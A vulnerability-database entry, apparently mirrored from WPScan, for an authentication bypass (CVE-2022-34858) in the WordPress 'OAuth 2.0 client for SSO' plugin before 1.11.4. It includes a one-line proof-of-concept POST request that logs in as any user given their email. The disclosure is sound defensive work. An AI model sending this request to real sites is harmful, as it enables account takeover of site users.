Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:C713CDC1-327A-49E1-AD19-EDBF8921B722
HistoryJun 21, 2022 - 12:00 a.m.

OAuth 2.0 client for SSO < 1.11.4 - Authenticated Bypass

2022-06-2100:00:00
wpscan.com
11

0.003 Low

EPSS

Percentile

68.0%

JSON

The plugin allows attackers to login as any user by just knowing their email address

PoC

POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded option=mooauth&email;[email protected]

CPENameOperatorVersion
oauth-clientlt1.11.4

Related

nvd 1
prion 1
cvelist 1
cve 1
wpexploit 1
patchstack 1
nvd
nvd
CVE-2022-34858
2022-08-22 15:15:16
prion
prion
Authentication flaw
2022-08-22 15:15:00
cvelist
cvelist
CVE-2022-34858 WordPress OAuth 2.0 client for SSO plugin <= 1.11.3 - Authentication Bypass vulnerability
2022-08-02 00:00:00
cve
cve
CVE-2022-34858
2022-08-22 15:15:16
wpexploit
wpexploit
OAuth 2.0 client for SSO < 1.11.4 - Authenticated Bypass
2022-06-21 00:00:00
patchstack
patchstack
WordPress OAuth 2.0 client for SSO plugin <= 1.11.3 - Authentication Bypass vulnerability
2022-08-02 00:00:00

0.003 Low

EPSS

Percentile

68.0%

JSON
Related for WPVDB-ID:C713CDC1-327A-49E1-AD19-EDBF8921B722
nvd1prion1cvelist1cve1wpexploit1patchstack1